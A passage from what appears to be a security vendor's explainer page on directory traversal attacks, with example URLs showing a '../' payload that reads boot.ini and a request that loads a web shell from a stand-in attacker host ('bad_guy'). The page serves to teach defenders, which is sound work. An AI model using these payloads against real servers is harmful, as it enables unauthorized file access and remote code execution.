- Product
Product Overview
Sophisticated security with unmatched simplicityCloud SIEM
Pre-configured detections across your environmentHoneypots
Deception technology to detect lateral movementEndpoint Visibility
Real-time monitoring with added detection & responseSecurity Reports
Data visualizations, compliance reports, and executive summariesAutomated Response
Detect, prioritize, and neutralize threats around the clockIntegrations
Cloud, on-prem, and open API connectionsXDR Platform
A complete view to identify risk, and things operational
- Pricing
- Why Blumira
Why Blumira
The Security Operations platform IT teams loveWatch A Demo
See Blumira in action and how it builds operational resilienceUse Cases
A unified security solution for every challengePricing
Unlimited data and predictable pricing structureCompany
Our human-centered approach to cybersecurityCompare Blumira
Find out how Blumira stacks up to similar security toolsIntegrations
Cloud, on-prem, and open API connectionsCustomer Stories
Learn how others like you found success with Blumira
- Solutions
- Partners
- Resources
Directory Traversal
A directory traversal – sometimes called path traversal – is when an attacker attempts to access files outside of the main web root directory. When the server is vulnerable to directory traversal it can allow the attack broad access into server, allowing not only the ability to read the contents of files but also potentially run arbitrary commands depending on what they can access.
Basic Example
http://vulnerable_site.com/get_file.asp?file=file.pdf
If the vulnerable_site.com was impacted by directory traversal, and let’s say the attacker wanted the boot.ini file in C:\, they could then theoritically run:
http://vulnerable_site.com/get_file.asp?file=../../../../boot.ini
This becomes much more dangerous when the attacker is able to access binaries that can run code, or are from outside sources.
http://vulnerable_site.com/get_file.asp?file=http://bad_guy/webshell.asp